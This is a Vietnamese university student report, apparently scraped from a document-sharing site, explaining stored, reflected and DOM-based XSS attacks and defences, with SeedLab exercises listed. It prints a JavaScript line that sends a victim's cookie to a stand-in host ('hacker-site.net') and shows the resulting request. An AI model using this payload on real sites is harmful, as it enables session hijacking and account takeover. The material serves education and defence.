1. Trang chủ
  2. » Luận Văn - Báo Cáo

BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống

49 79 4

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Nghiên Cứu, Triển Khai Tấn Công Khai Thác Lỗ Hổng XSS Và Cách Phòng Chống
Tác giả Đinh Thị Thu, Thiều Mạnh Đức, Bùi Đức Thắng
Người hướng dẫn Ts. Phạm Duy Trung
Trường học Học viện Kỹ thuật Mật mã
Thể loại báo cáo
Năm xuất bản 2022
Thành phố Hà Nội
Định dạng
Số trang 49
Dung lượng 10,59 MB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

HỌC VIỆN KỸ THUẬT MẬT MÃ KHOA CÔNG NGHỆ THÔNG TIN BÁO CÁO CƠ SỞ AN TOÀN THÔNG TIN ĐỀ TÀI NGHIÊN CỨU, TRIỂN KHAI TẤN CÔNG KHAI THÁC LỖ HỔNG XSS VÀ CÁCH PHÒNG CHỐNG Sinh viên thực hiện Đinh.

Trang 1

HỌC VIỆN KỸ THUẬT MẬT MÃ KHOA CÔNG NGHỆ THÔNG TIN

 BÁO CÁO CƠ SỞ AN TOÀN THÔNG TIN

ĐỀ TÀI:

NGHIÊN CỨU, TRIỂN KHAI TẤN CÔNG KHAI THÁC LỖ HỔNG

XSS VÀ CÁCH PHÒNG CHỐNG.

Sinh viên thực hiện: Đinh Thị Thu - AT160350

Thiều Mạnh Đức - AT160414 Bùi Đức Thắng - AT160445

Giảng viên hướng dẫn: Ts PHẠM DUY TRUNG

Hà Nội 2022

Trang 2

LỜI NÓI ĐẦU

Trong những năm gần đây cùng với sự bùng nổ của internet kèm theo đó là sự phát triển của World Wide Web Các doanh nghiệp, cá nhân, và chính phủ đã đưa ra kết luận rằng các trang web hay các ứng dụng web có khả năng cung cấp đầy đủ các giải pháp hiệu quả, đáng tin cậy và có thể giải quyết các thách thức về giao tiếp và tiến hành thương mại hóa trong thê kỷ XX Nhất là trong thời gian dịch bệnh vừa rồi thì việc chuyển đổi công việc từ trực tiếp qua hình thức online trên các trang web lại càng trở nên mạnh mẽ bởi sự tiện dụng và những ích lợi to lớn mà nó mang lại Tuy nhiên, đi kèm với

sự tiện dụng thì về vấn đề an toàn của các trang web hay các ứng dụng web đã trở nên ngày càng quan trọng và đáng để lưu tâm Các trang web về giáo dục, y tế, tài chính hay các dữ liệu nhạy cảm hơn bao giờ hết đang phải đối mặt với nhiều nguy cơ bị tấn công từ các hacker Tại Việt Nam trong năm vừa qua cũng đã có rất nhiều cuộc tấn công với quy

mô lớn bé khác nhau nhắm vào các tổ chức doanh nghiệp làm ảnh hưởng không nhỏ đến tài sản và uy tín của doanh nghiệp đó trên thị trường.

Nhiễu lỗ hổng trang web không được kiểm tra kỹ để điều khiển các ứng dụng trên trang web là nguyên nhân để các hacker có thể dựa vào đó tấn công Trong số đó có một loại tấn công cực kì nguy hiểm mà các nhà bảo mật luôn cảnh báo người dùng đó là tấn công Cross-Site Scripting (hay còn gọi là XSS) Ngoài ra còn có một số dạng tấn công khác như: SQL Injection, Shell Injection, Script language injection, File inclusion, XML injection, XPATH injection.v.v.

Trong báo cáo này nhóm xin phép tập trung trình bày về lỗ hổng bảo mật liên quan đến tấn công Cross-Site Scripting, tương quan về các khái niệm, cách thức kẻ tấn công hoạt động, hậu quả nặng nề mà nó đem đến cũng như cách để phòng chống tấn công hiệu quả nhất

Trang 3

MỤC LỤC

LỜI NÓI ĐẦU 2

MỤC LỤC 3

GIỚI THIỆU CHUNG 6

0.1 Tính cấp thiết của đề tài 6

0.2 Mục tiêu thực hiện 6

CHƯƠNG 1: GIỚI THIỆU VỀ TẤN CÔNG XSS 7

1.1 Tìm hiểu XSS 7

1.2 Cơ chế hoạt động tấn công XSS 8

1.2.1 Bản chất của cuộc tấn công 8

1.2.2 Quá trình thực hiện tấn công 8

1.3 Hình thức tồn tại của XSS 10

1.3.1 Stored XSS 10

1.3.2 Reflected XSS 11

1.3 Mức độ nguy hiểm của XSS 12

1.4 Mục tiêu mà XSS hướng tới 13

CHƯƠNG 2: CÁC LOẠI TẤN CÔNG XSS 15

2.1 Phân loại các cuộc tấn công XSS 15

2.1.1 Reflected XSS 15

2.1.2 Stored XSS 17

2.1.3 DOM BASED XSS 20

2.1.4 So sánh các loại tấn công XSS 22

2.1.4.1 So sánh tấn công Reflected XSS và Stored XSS 23

2.1.4.2 So sánh tấn công Reflected XSS và DOM- based XSS 24

2.1.5 Kết luận: 24

Trang 4

2.2 Biện pháp phòng chống tấn công 25

2.2.1 Data validation 26

2.2.2 Filtering 26

2.2.3 Escaping 27

2.2.4 Một số biện pháp ngăn chặn khác 27

CHƯƠNG 3: THỰC NGHIỆM TRÊN MÔI TRƯỜNG SEEDLAB 30

Lab 1: Đăng một thông điệp độc hại để hiển thị cửa sổ thông báo 30

Lab 2: Đăng một thông điệp độc hại để hiển thị cookie 32

Lab 3 : Đánh cắp Cookie từ thiết bị của nạn nhân 34

Lab 4: Cướp sesion (Session Hijacking) sử dụng cookie bị đánh cắp 36

Lab 5: Viết một con sâu máy tính thực hiện tấn công XSS (XSS Worm) 39

Trang 5

DANH MỤC HÌNH VẼ

CHƯƠNG 1:

Hình 1 1 Mô hình tấn công XSS 7

Hình 1 2 Mô hình tấn công Stored XSS 10

Hình 1 3 Mô hình tấn công Reflected XSS 11

Hình 1 4 Thống kê những lỗ hổng phổ biến nhất 12

Hình 1 5 Mục tiêu mà XSS hướng tới 13

Chương 2: Hình 2 1 : Hình thức tấn công Reflected XSS 15

Hình 2 2 Kịch bản tấn công Reflected XSS 16

Hình 2 3 Mô hình tấn công Stored XSS 18

Hình 2 4 Kịch bản tấn công Stored XSS 20

Hình 2 5 Kịch bản tấn công DOM -based XSS 20

CHƯƠNG 3 :

THỰC NGHIỆM

Trang 6

GIỚI THIỆU CHUNG

0.1 Tính cấp thiết của đề tài

Website ngày nay rất phức tạp và thường là các web động, nội dung củaweb được cập nhật thông qua các thành viên tham gia ở khắp mọi nơi trên thếgiới Và hầu hết các website này dùng Cookie để xác thực người dùng

Điều này đồng nghĩa với việc Cookie của ai thì người đó dùng, Nếu lấyđược Cookie người dùng nào Hacker sẽ giả mạo được chính người dùng đó (điềunày là hết sức nguy hiểm) Vậy làm sao để các hacker có thể lấy cookie của bạn?

Có rất nhiều cách để các hacker làm việc đó, ở đây tôi xin trình bày một trongnhững cách mà hacker thường dùng, đó chính là họ nhờ vào lỗi Cross SiteScripting(XSS)

Cross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biếnnhất hiện nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọngđối với các nhà phát triển web và cả những người sử dụng web Bất kì mộtwebsite nào cho phép người sử dụng đăng thông tin mà không có sự kiểm tra chặtchẽ các đoạn mã nguy hiểm thì đều có thể tiềm ẩn các lỗi XSS

XSS được thực hiện trên các thẻ JavaScript, và các thẻ JavaScript chúng cóthể làm được những công việc sau:

Thay đổi cấu trúc của toàn bộ trang web ,tạo tùy ý các phần tử HTML,địnhtuyến lại các hình thức liên kết,phục hồi dữ liệu, xác thực,gửi và nhận dữ liệu,đọccác tổ hợp phím

0.2 Mục tiêu thực hiện

Nguyên cứu về tấn công XSS cùng các kĩ thuật tấn công ,các cách phòng tránh vàthực nghiệm trên môi trường Seedlab

Mục tiêu đặt ra khi thực hiện đề tài :

 Nắm được kỹ thuật tấn công XSS ,mô hình ,phương thức tấn công

 Phân biệt được 3 loại tấn công XSS chính và phương pháp ngăn chặn

 Demo tấn công XSS

Trang 7

CHƯƠNG 1: GIỚI THIỆU VỀ TẤN CÔNG XSS

mã script nguy hiểm có khả năng đánh cắp hay thiết lập được những thông tin quan trọng như cookies, mật khẩu, usename Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML

và cũng có thể là cả các thẻ HTML

Phương pháp này không nhằm vào máy chủ hệ thống mà chủ yếu tấn công trên chính máy người sử dụng Hacker sẽ lợi dụng sự kiểm tra lỏng lẻo từ ứng dụng và hiểu biết hạn chế của người dùng cũng như biết đánh vào sự tò mò của họ dẫn đến người dùng bị

Trang 8

mất thông tin một cách dễ dàng

Thông thường hacker lợi dụng địa chỉ URL để đưa ra những liên kết là tác nhân kích hoạt những đoạn chương trình được viết bằng ngôn ngữ máy khách như VBScript,

JavaScript được thực thi trên chính trình duyệt của nạn nhân

1.2.1 Bản chất của cuộc tấn công

Về cơ bản khi thực hiện tấn công Cross-site scripting thì hacker sẽ thực hiện gửi chèn các lệnh và script độc hại, thường thì các mã script này được viết bằng các ngôn ngữ lập trình phía client như VBScript, ActiveX và Flash (hiện được coi là cũ hoặc thậm chí lỗi thời), nhưng phổ biến nhất vẫn là JavaScript - chủ yếu vì JavaScript là nền tảng cho hầu hết các trải nghiệm duyệt web.

XSS hoạt động bằng cách điều khiển một trang web dễ bị tấn công để trả về JavaScript độc hại cho người dùng Khi mã độc được thực thi bên trong trình duyệt, hacker hoàn toàn có thể xâm nhập vào tài khoản và sử dụng dữ liệu của người dùng vào mục đích cá nh

1.2.2 Quá trình thực hiện tấn công

Để chạy được code JavaScript độc hại trong trình duyệt của nạn nhân, trướctiên, kẻ tấn công phải tìm cách truyền payload vào trang web mà nạn nhân truycập Tất nhiên, kẻ tấn công có thể sử dụng các kỹ thuật social engineering đểthuyết phục người dùng truy cập trang đã bị tấn công đó

Để một cuộc tấn công XSS diễn ra, trang web bị tấn công cần trực tiếp baogồm đầu vào của người dùng trong các trang của mình Kẻ tấn công sau đó có thểchèn một chuỗi sẽ được sử dụng trong trang web và được xử lý dưới dạng code bởitrình duyệt nạn nhân

Mã giả phía máy chủ (server-side pseudo-code) này được sử dụng để hiểnthị bình luận gần đây nhất trên trang web:

Trang 9

Lưu ý: Lỗ hổng XSS chỉ có thể tồn tại nếu payload (tập lệnh độc hại) mà

kẻ tấn công chèn vào được phân tích (thành HTML như trong trường hợp trên)trong trình duyệt của nạn nhân

Trang 10

1.3 Hình thức tồn tại của XSS

1.3.1 Stored XSS

Hình 1 2 Mô hình tấn công Stored XSS

Stored XSS là hình thức tấn công mà ở đó cho phép kẻ tấn công có thể chèn một đoạn script nguy hiểm (thường là Javascript) vào website của chúng ta thông qua một chức năng nào đó (vd: viết lời bình, guestbook, gởi bài ), để từ đó khi các thành viên khác truy cập website sẽ bị dính mã độc từ kẻ tấn công này, các mã độc này thường được lưu lại trong database của website chúng ta nên gọi là Stored Stored XSS phát sinh do chúng ta không lọc dữ liệu do thành viên gởi lên một cáchđúng đắn, khiến cho mã độc được lưu vào Database của website

Trang 11

1.3.2 Reflected XSS

Hình 1 3 Mô hình tấn công Reflected XSS

Trong hình thức này, kẻ tấn công thường gắn thêm đoạn mã độc vào URL củawebsite chúng ta và gởi đến nạn nhân, nếu nạn nhân truy cập URL đó thì sẽ bị dính

mã độc Điều này xảy ra do ta không chú ý filter input từ URL của website mình

Tấn công XSS là tấn công nguy hiểm, cho phép kẻ tấn công ăn cắp thông tin trên máy nạn nhân thông qua javascript như ăn cắp cookie, chèn mã độc để chiến quyềnđiều khiển

XSS là một trong những lỗi phổ biến, có rất nhiều trang web bị mắc phải lỗinày, chính vì thế ngày càng có nhiều người quan tâm đến lỗi này Gần đây, theoBrian Krebs của tờ Washington Post báo cáo rằng hàng ngàn trang web không antoàn đã được xác định vào năm ngoái, và trang Xssed.com đưa ra danh sách gần13.000 trang trong đó có nhiều lỗ hổng cross-site scripting (XSS)

1.3 Mức độ nguy hiểm của XSS

Theo thống kê về các lỗ hổng bảo mật thường bị tấn công nhất vào năm 2009

Trang 12

để sót một lỗi XSS trong bộ lọc của mình Một phương pháp tối ưu vẫn còn đang ởphía trước

Kẻ tấn công tiến hành khai thác lỗ hổng XSS trên nhiều trang web sẽ đem lại hậu quả rất nặng nề:

 Mạo danh hoặc giả dạng người dùng của nạn nhân.

 Thực hiện bất kỳ hành động nào mà người dùng có thể thực hiện.

 Đọc bất kỳ dữ liệu nào mà người dùng có thể truy cập.

 Nắm bắt thông tin đăng nhập của người dùng.

 Thực hiện thay đổi bề mặt ảo của trang web.

 Chèn trojan độc hại vào trang web.

Đặc biệt trong thực tế một cuộc tấn công XSS diễn ra còn phụ thuộc vào bản chất của ứng dụng, chức năng, dữ liệu cũng như trạng thái của người dùng bị xâm phạm

Ví dụ:

Trang 13

 Trong một ứng dụng brochureware, nơi tất cả người dùng đều xuất hiện ẩn danh thì khi một cuộc tấn công XSS xảy ra nó có thể sẽ làm tất cả thông tin người dùng bị công khai Từ đó dẫn đến lộ danh tính của người dùng.

 Trong một ứng dụng chứa các thông tin bảo mật như giao dịch ngân hàng, email hoặc hồ sơ chăm sóc sức khỏe, tấn công XSS sẽ gây ra những hậu quả nghiêm trọng về cả tài sản lẫn độ uy tín của doanh nghiệp.

 Nếu người dùng bị xâm phạm có các đặc quyền nâng cao trong ứng dụng, thì sẽ ảnh hưởng rất nghiêm trọng Cho phép hacker có toàn quyền kiểm soát ứng dụng

dễ bị tấn công và xâm phạm tất cả người dùng và dữ liệu của họ.

1.4 Mục tiêu mà XSS hướng tới

Hình 1 5 Mục tiêu mà XSS hướng tới

XSS khai thác thường được sử dụng để đạt được các kết quả độc hại sau đây:

* Truy cập thông tin nhạy cảm hoặc bị hạn chế

* Ăn cắp tiền (giao dịch ngân hàng, mua hàng online )

* Theo dõi thói quen lướt web của người dùng

* Thay đổi năng của trình duyệt

* Bôi nhọ danh tiếng của một cá nhân hay công ty

* Hủy hoại ứng dụng Web

* Tấn công từ chối dịch vụ

Trang 14

Trang 15

CHƯƠNG 2: CÁC LOẠI TẤN CÔNG XSS

2.1 Phân loại các cuộc tấn công XSS

2.1.1 Reflected XSS

Reflected XSS là hình thức tấn công được sử dụng nhiều nhất Đây là nơi

mã script độc hại đến từ HTTP request Từ đó, hacker đánh cắp dữ liệu của ngườidùng, chiếm quyền truy cập và hoạt động của họ trên website thông qua việc chiasẻ URL chứa mã độc Hình thức này thường nhắm đến một khối ít nạn nhân

Trang 16

Hình 2 2 Kịch bản tấn công Reflected XSS

Chi tiết từng bước thực hiện:

 Người dùng đăng nhập web và giả sử được gán session:

Giả sử example.com là website nạn nhân truy cập, hacker-site.net là trang

của hacker tạo ra

 Nạn nhân truy cập đến URL trên

Trang 17

 Server phản hồi cho nạn nhân, kèm với dữ liệu có trong request (đoạnjavascript của hacker).

 Trình duyệt nạn nhân nhận phản hồi và thực thi đoạn javascript

 Đoạn javascript mà hacker tạo ra thực tế như sau:

var i=new Image; i.src=http://hacker-site.net/ +document.cookie;

Dòng lệnh trên bản chất thực hiện request đến site của hacker với tham số làcookie người dùng:

GET /sessId=5e2c648fa5ef8d653adeede595dcde6f638639e4e59d4HTTP/1.1

Host: hacker-site.net

 Từ phía site của mình, hacker sẽ bắt được nội dung request trên và coi nhưsession của người dùng sẽ bị chiếm Đến lúc này, hacker có thể giả mạovới tư cách nạn nhân và thực hiện mọi quyền trên website mà nạn nhân có

2.1.2 Stored XSS

Stored XSS là loại tấn công cross-site scripting gây thiệt hại nhiều nhất Kẻtấn công truyền một tập lệnh - còn được gọi là payload - được lưu trữ vĩnh viễntrên ứng dụng đích, chẳng hạn như cơ sở dữ liệu

Ví dụ: kẻ tấn công chèn một đoạn mã độc trên blog, trong một bài đăng trên

diễn đàn hoặc trong trường bình luận

Trang 18

Lúc này Payload XSS sẽ đóng vai trò như một phần của trang web khi nạnnhân điều hướng đến trang web bị ảnh hưởng trong trình duyệt Khi nạn nhân xemtrang trên trình duyệt sẽ vô tình thực thi tập lệnh độc hại.

Hình 2 3 Mô hình tấn công Stored XSS

Stored XSS khác với Reflected XSS, hình thức này nhắm đến nhiều nạnnhân cùng lúc Đây là nơi script độc hại đến từ cơ sở dữ liệu của trang web Hackerchèn các mã độc vào cơ sở dữ liệu thông qua các dữ liệu đầu vào như input,form… Khi người dùng truy cập và tiến hành những thao tác liên quan đến dữ liệu

đã lưu thì mã độc sẽ lập tức hoạt động trên trình duyệt

Với kỹ thuật Stored XSS, hacker không khai thác trực tiếp mà phải thực hiệntối thiểu qua 2 bước

Bước đầu tiên hacker sẽ thông qua các điểm đầu vào (form, input,textarea…) không được kiểm tra kỹ để chèn vào CSDL các đoạn mã nguy hiểm

Trang 19

Tiếp sau đó, khi mà người dùng truy cập vào ứng dụng web và thực hiện cácthao tác liên quan đến dữ liệu được lưu này, đoạn mã của hacker sẽ được thực thitrên trình duyệt người dùng.

Kịch bản khai thác:

Trang 21

DOM-based XSS là một loại tấn công XSS nâng cao có thể thực hiện đượckhi tập lệnh phía máy khách của ứng dụng web ghi dữ liệu do người dùng cung cấpvào Document Object Model (DOM).

Sau đó, ứng dụng web sẽ đọc dữ liệu từ DOM và gửi nó đến trình duyệt.Nếu dữ liệu không được xử lý chính xác, kẻ tấn công có thể đưa ra payload đượclưu trữ như một phần của DOM Payload sau đó sẽ thực thi khi dữ liệu được đọclại từ DOM

Khác với hai loại tấn công kể trên thì DOM-based XSS tiến hành khai thác

lỗ hổng bảo mật tồn tại trong mã phía client chứ không phải mã phía server Hìnhthức này dùng để khai thác XSS dựa vào việc thay đổi HTML của tài liệu, hay nóicách khác là thay đổi cấu trúc DOM

Phân tích cụ thể một ví dụ:

Một website có URL đến trang đăng ký như sau:

http://example.com/register.php?message=Please fill in the form

Khi truy cập đến thì chúng ta thấy một Form rất bình thường:

Thay vì truyền :

Thì truyền :

message=Please fill in the form

Trang 22

Khi đấy form đăng ký sẽ trở thành như thế này:

Người dùng sẽ chẳng chút nghi ngờ với một form “bình thường” như thế này, vàkhi lựa chọn giới tính, Script sẽ được thực thi:

Đây là một kiểu tấn công nguy hiểm và rất dễ xảy ra do hacker hướng đến mụctiêu là máy bên phía client chứ không phải là tấn công từ bên server Với lượngkiến thức hạn chế trong phòng chống các cuộc tấn công và sự thiếu cảnh giác từngười dùng nên đây sẽ là mục tiêu được kẻ tấn công cực kì yêu thích hướng đến

2.1.4 So sánh các loại tấn công XSS

Trang 23

2.1.4.1 So sánh tấn công Reflected XSS và Stored XSS

 Thứ nhất, để khai thác Reflected XSS, hacker phải lừa được nạn nhân truycập vào URL của mình Còn Stored XSS không cần phải thực hiện việcnày, sau khi chèn được mã nguy hiểm vào CSDL của ứng dụng, hacker chỉviệc ngồi chờ nạn nhân tự động truy cập vào Với nạn nhân, việc này làhoàn toàn bình thường vì họ không hề hay biết dữ liệu mình truy cập đã bịnhiễm độc

 Thứ hai, mục tiêu của hacker sẽ dễ dàng đạt được hơn nếu tại thời điểm tấncông nạn nhân vẫn trong phiên làm việc(session) của ứng dụng web VớiReflected XSS, hacker có thể thuyết phục hay lừa nạn nhân đăng nhập rồitruy cập đến URL mà hắn ta cung cấp để thực thi mã độc Nhưng StoredXSS thì khác, vì mã độc đã được lưu trong CSDL Web nên bất cứ khi nàongười dùng truy cập các chức năng liên quan thì mã độc sẽ được thực thi,

và nhiều khả năng là những chức năng này yêu cầu phải xác thực (đăng

Trang 24

nhập) trước nên hiển nhiên trong thời gian này người dùng vẫn đang trongphiên làm việc.

Từ những điều này có thể thấy Stored XSS nguy hiểm hơn Reflected XSSrất nhiều, đối tượng bị ảnh hưởng có thế là tất cả nhưng người sử dụng ứng dụngweb đó Và nếu nạn nhân có vai trò quản trị thì còn có nguy cơ bị chiếm quyềnđiều khiển web

2.1.4.2 So sánh tấn công Reflected XSS và DOM- based XSS

Payload (tải trọng) của kẻ tấn công là

một phần của yêu cầu được gửi đến

máy chủ web

là một loại XSS nâng cao xảy ra bằngcách ghi dữ liệu vào Mô hình đối tượngtài liệu (DOM)

Tải trọng được thực thi bằng mã phíafront-end sau khi JavaScript hợp phápcủa chính trang web được thực thiTải trọng thường được phân phối qua

URL

Tải trọng thường được phân phối quaURL (Reflected) hoặc được lưu trữ(Stored)

Ngày đăng: 30/09/2022, 01:56

HÌNH ẢNH LIÊN QUAN

Hình 1.1 Mơ hình tấn cơng XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 1.1 Mơ hình tấn cơng XSS (Trang 6)
1.3. Hình thức tồn tại của XSS  1.3.1. Stored XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
1.3. Hình thức tồn tại của XSS 1.3.1. Stored XSS (Trang 9)
Hình 1.3 Mơ hình tấn công Reflected XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 1.3 Mơ hình tấn công Reflected XSS (Trang 10)
Hình 1.4 Thống kê những lỗ hổng phổ biến nhất - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 1.4 Thống kê những lỗ hổng phổ biến nhất (Trang 11)
Hình 1.5 Mục tiêu mà XSS hướng tới - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 1.5 Mục tiêu mà XSS hướng tới (Trang 12)
Hình 2. 1: Hình thức tấn cơng Reflected XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 2. 1: Hình thức tấn cơng Reflected XSS (Trang 14)
Hình 2.2 Kịch bản tấn công Reflected XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 2.2 Kịch bản tấn công Reflected XSS (Trang 15)
Hình 2.3 Mơ hình tấn cơng Stored XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 2.3 Mơ hình tấn cơng Stored XSS (Trang 17)
Hình 2.4 Kịch bản tấn công Stored XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 2.4 Kịch bản tấn công Stored XSS (Trang 19)
Hình 2 .5 Kịch bản tấn công DOM-based XSS - BÁO CÁO ĐỀ TÀI tấn công Cross Site Scripting (XSS) và cách phòng chống
Hình 2 5 Kịch bản tấn công DOM-based XSS (Trang 20)

TỪ KHÓA LIÊN QUAN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

🧩 Sản phẩm bạn có thể quan tâm

w